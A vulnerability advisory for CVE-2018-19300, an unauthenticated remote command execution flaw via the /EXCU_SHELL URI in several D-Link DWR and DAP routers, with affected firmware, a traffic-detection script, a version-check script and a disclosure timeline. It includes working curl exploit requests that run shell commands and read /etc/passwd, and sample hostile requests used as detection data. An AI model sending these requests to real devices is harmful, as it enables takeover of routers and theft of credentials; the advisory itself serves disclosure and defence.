CVE-2018-19300: Remote Command Execution Vulnerability in D-Link DWR and DAP Routers


Overview

In early November 2018, while analyzing D-Link DWR devices, we discovered a vulnerability in DWR-711 and DAP-1530 routers. This vulnerability allows an unauthenticated attacker to execute shell commands with full administrative privileges on the vulnerable device.

Vulnerability Details

  • According to D-Link, the following devices and firmware versions are affected:
    • DAP-1530 (All A revisions) before firmware version 1.06b01
    • DAP-1610 (All A revisions) before firmware version 1.06b01
    • DWR-111 (All A revisions) before firmware version 1.02v02
    • DWR-116 (All A revisions) before firmware version 1.06b03
    • DWR-512 (All B revisions) before firmware version 2.02b01
    • DWR-711 (All A revisions) through firmware version 1.11
    • DWR-712 (All B revisions) before firmware version 2.04b01
    • DWR-921 (All A revisions) before firmware version 1.02b01
    • DWR-921 (All B revisions) before firmware version 2.03b01
  • The vulnerability exists within the /EXCU_SHELL URI. To exploit it, an attacker only has to send a GET request to that URI with the following headers:
    • cmdnum: 1 (This specifies the number of commands to execute, but 1 is sufficient for this)
    • command1: [command] (This is the command to be executed)
    • confirm1: n (This specifies that the command should be executed without prior confirmation)
  • A curl command would look like this:
    • curl '[IP]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: ls -l /' -H 'confirm1: n'
  • The shell supports all basic bash commands and more, and delivers the output in an HTTP response. /EXCU_SHELL passes all input straight to the /bin/bash shell.
  • Example:
    • curl 'http://[IP]:[Port]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: cat /etc/passwd' -H 'confirm1: n' --compressed

      admin:[Password]:0:0:Adminstrator:/:/bin/sh


The functionality appears to be intentional, as /EXCU_SHELL is used for tasks such as retrieving hardware and firmware version information. An active check for this vulnerability is available in the Greenbone Security Feed under the OID 1.3.6.1.4.1.25623.1.0.113294.
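Besides the active check in the feed, the request pattern described above is easy to spot passively in captured HTTP traffic: any request to /EXCU_SHELL carrying cmdnum, commandN and confirmN headers is a command execution attempt. The following Python script is an added example written for this advisory, not Greenbone's own check and not code from D-Link. It parses raw HTTP requests (the sample requests and the 192.0.2.10 address are constructed for illustration) and reports which ones match the pattern, separating plain hits on the URI from hits that carry command headers.

```python
"""Flag HTTP requests matching the CVE-2018-19300 pattern (added example, not the feed's check)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample of raw HTTP requests, as a proxy or IDS might capture them.
# The host 192.0.2.10 is a documentation address, not a real device.
SAMPLE_REQUESTS = [
    "GET /EXCU_SHELL HTTP/1.1\r\nHost: 192.0.2.10\r\ncmdnum: 1\r\n"
    "command1: cat /etc/passwd\r\nconfirm1: n\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: curl/7.64.0\r\n\r\n",
    # Header names are case-insensitive, and more than one command may be sent.
    "GET /EXCU_SHELL?x=1 HTTP/1.1\r\nHost: 192.0.2.10\r\nCmdNum: 2\r\n"
    "Command1: id\r\nConfirm1: n\r\nCommand2: uname -a\r\nConfirm2: n\r\n\r\n",
    # Hit on the URI without command headers (e.g. the device's own version lookup).
    "GET /EXCU_SHELL HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "POST /login.cgi HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 0\r\n\r\n",
]

COMMAND_HEADER = re.compile(r"^command(\d+)$")


@dataclass
class Finding:
    request_line: str
    cmdnum: Optional[int] = None
    commands: List[str] = field(default_factory=list)  # values of commandN headers, in order

    @property
    def severity(self) -> str:
        # Command headers present means an execution attempt; a bare hit is only informational.
        return "critical" if self.commands else "info"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, List[str]]]:
    """Split a raw HTTP request into method, target and lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers


def inspect_request(raw: str) -> Optional[Finding]:
    """Return a Finding if the request targets /EXCU_SHELL, else None."""
    method, target, headers = parse_request(raw)
    path = target.split("?", 1)[0]
    if path.upper() != "/EXCU_SHELL":
        return None
    finding = Finding(request_line=f"{method} {target}")
    if "cmdnum" in headers:
        try:
            finding.cmdnum = int(headers["cmdnum"][0])
        except ValueError:
            pass  # malformed count; the command headers still decide severity
    for name, values in headers.items():
        if COMMAND_HEADER.match(name):
            finding.commands.extend(values)
    return finding


def scan(requests: List[str]) -> List[Finding]:
    """Run inspect_request over a batch of captured requests and keep the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"[{hit.severity}] {hit.request_line} cmdnum={hit.cmdnum} commands={hit.commands}")
```

Matching on the path alone (query string stripped, case-insensitive) keeps the rule simple; the command headers are what raise a hit from informational to critical, so a device's own legitimate use of the URI does not drown out real attempts.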

Mitigation

The vendor has started to release firmware updates for all affected devices. Please see the vendor advisory linked in the references for more information.
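For inventory purposes, the affected-version table above can be turned into a simple check that tells whether a given model, hardware revision and firmware version still needs the update. The script below is an added example for this advisory, not vendor code. It assumes the version formats seen in the table (major.minor with an optional letter-plus-number build suffix such as b01 or v02), that a version carrying a build suffix sorts after the same bare version, and that a hardware revision string such as "A1" belongs to the "A" revisions the table refers to.

```python
"""Check a D-Link device against the CVE-2018-19300 affected-version table (added example)."""
import re
from typing import Dict, Optional, Tuple

# (model, hardware revision letter) -> (relation, boundary version), taken from the advisory.
# "before": affected if firmware < boundary; "through": affected if firmware <= boundary.
AFFECTED: Dict[Tuple[str, str], Tuple[str, str]] = {
    ("DAP-1530", "A"): ("before", "1.06b01"),
    ("DAP-1610", "A"): ("before", "1.06b01"),
    ("DWR-111", "A"): ("before", "1.02v02"),
    ("DWR-116", "A"): ("before", "1.06b03"),
    ("DWR-512", "B"): ("before", "2.02b01"),
    ("DWR-711", "A"): ("through", "1.11"),
    ("DWR-712", "B"): ("before", "2.04b01"),
    ("DWR-921", "A"): ("before", "1.02b01"),
    ("DWR-921", "B"): ("before", "2.03b01"),
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:([a-z])(\d+))?$", re.IGNORECASE)


def parse_version(version: str) -> Tuple[int, int, str, int]:
    """Turn '1.06b01' into (1, 6, 'b', 1); a bare '1.11' becomes (1, 11, '', 0).

    Assumption: a build suffix sorts after the bare version it extends.
    """
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version format: {version!r}")
    major, minor, tag, build = m.groups()
    return int(major), int(minor), (tag or "").lower(), int(build or 0)


def is_affected(model: str, hw_revision: str, firmware: str) -> Optional[bool]:
    """Return True/False for listed models, or None if the model/revision is not in the table."""
    key = (model.strip().upper(), hw_revision.strip().upper()[:1])
    if key not in AFFECTED:
        return None
    relation, boundary = AFFECTED[key]
    current, limit = parse_version(firmware), parse_version(boundary)
    return current < limit if relation == "before" else current <= limit


if __name__ == "__main__":
    # Constructed inventory entries, not real devices.
    for entry in [("DWR-921", "B1", "2.02b05"), ("DWR-921", "B1", "2.03b01"),
                  ("DWR-711", "A1", "1.11"), ("DIR-615", "A1", "1.00")]:
        print(entry, "->", is_affected(*entry))
```

A result of None means the advisory says nothing about that model, not that it is safe; such devices should be checked against the vendor advisory directly.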

References

Disclosure Timeline

  • 2018/11/13: Informed D-Link USA Incident Response Team about the vulnerability. (Further informed D-Link IR Team that the vulnerability will be disclosed if no advisory or fix is released within 90 days)
  • 2018/11/14: Response from D-Link IR Team, asking for specifics about model number and firmware version
  • 2018/11/14: Provided D-Link IR Team with the requested information
  • 2018/11/14: Answer from D-Link IR Team, detailing their plan to go about the disclosure, asking the 3rd party (us) to request a CVE ID
  • 2018/11/15: Requested a CVE ID
  • 2018/11/15: Got assigned CVE-2018-19300
  • 2018/11/16: Informed D-Link IR Team about the CVE ID and asked for a status update within 90 days or once a fix has been developed
  • 2018/11/21: Mail from D-Link Germany, asking for more details and a PoC
  • 2018/11/21: Answered with further details and a PoC in the form of a specific curl request
  • 2019/02/11: End of 90-day deadline
  • 2019/02/19: Contacted D-Link Germany to ask about their progress and to inform about the deadline having been exceeded by a week
  • 2019/02/19: Answer from D-Link Germany that they will inform us as soon as possible
  • 2019/02/26: Informed D-Link that a disclosure is planned for the upcoming week
  • 2019/03/01: Answer from D-Link with information about affected models and fixed firmware versions
  • 2019/03/17: Disclosure of the vulnerability in accordance with our Responsible Disclosure guidelines, as no fix or notification by the vendor was provided to end users and the deadline had already been exceeded by 36 days